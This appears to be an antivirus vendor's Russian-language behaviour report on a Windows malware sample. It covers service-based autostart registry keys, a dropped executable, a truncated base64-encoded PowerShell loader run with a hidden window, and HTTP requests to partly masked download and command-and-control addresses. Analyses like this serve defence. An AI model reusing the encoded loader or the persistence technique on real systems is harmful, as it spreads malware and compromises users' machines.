Техническая информация
Для обеспечения автозапуска и распространения
Устанавливает следующие настройки сервисов
- [<HKLM>\System\CurrentControlSet\Services\mfcm120u] 'Start' = '00000002'
- [<HKLM>\System\CurrentControlSet\Services\mfcm120u] 'ImagePath' = '"%WINDIR%\SysWOW64\rundll32\mfcm120u.exe"'
Создает следующие сервисы
- 'mfcm120u' "%WINDIR%\SysWOW64\rundll32\mfcm120u.exe"
- 'mfcm120u' %WINDIR%\SysWOW64\rundll32\mfcm120u.exe
Вредоносные функции
Запускает на исполнение (эксплоит)
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -e JAB2AGEAaQB0AGsAdQB0AGgAZQBlAGYAPQAnAGgAdQBhAGwAdABhAHMAdABoAGkAYQBsACcAOwBbAE4AZQB0AC4AUwBlAHIAdgBpAGMAZQBQAG8AaQBuAHQATQBhAG4AYQBnAGUAcgBdADoAOgAiAHMAZQBDAHUAUgBpAGAAVAB5AGAAcABgAFIAbwB0AG...
Изменения в файловой системе
Создает следующие файлы
- %HOMEPATH%\81.exe
Удаляет следующие файлы
- %WINDIR%\syswow64\rundll32\mfcm120u.exe
Перемещает следующие файлы
- %HOMEPATH%\81.exe в %WINDIR%\syswow64\rundll32\mfcm120u.exe
Сетевая активность
Подключается к
- '20#.#35.10.215':80
TCP
Запросы HTTP GET
- http://xe#a.cz/MqjiWrT/
- http://ze###oser.com/wp-admin/LonYwsGW/
- http://ze###oser.com/cgi-sys/suspendedpage.cgi
- http://si##q.com/glpi/slliHcwAH/
Запросы HTTP POST
- http://20#.#35.10.215/invXHl/GsUskWQPlpfR/BTsWETs/7qEuXCc6AztvmgjgTT/iA9h1oDePWBoLu/
UDP
- DNS ASK xe#a.cz
- DNS ASK ze###oser.com
- DNS ASK si##q.com
Другое
Создает и запускает на исполнение
- '%HOMEPATH%\81.exe'
- '%WINDIR%\syswow64\rundll32\mfcm120u.exe'
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -e JAB2AGEAaQB0AGsAdQB0AGgAZQBlAGYAPQAnAGgAdQBhAGwAdABhAHMAdABoAGkAYQBsACcAOwBbAE4AZQB0AC4AUwBlAHIAdgBpAGMAZQBQAG8AaQBuAHQATQBhAG4AYQBnAGUAcgBdADoAOgAiAHMAZQBDAHUAUgBpAGAAVAB5AGAAcABgAFIAbwB0AG...' (со скрытым окном)
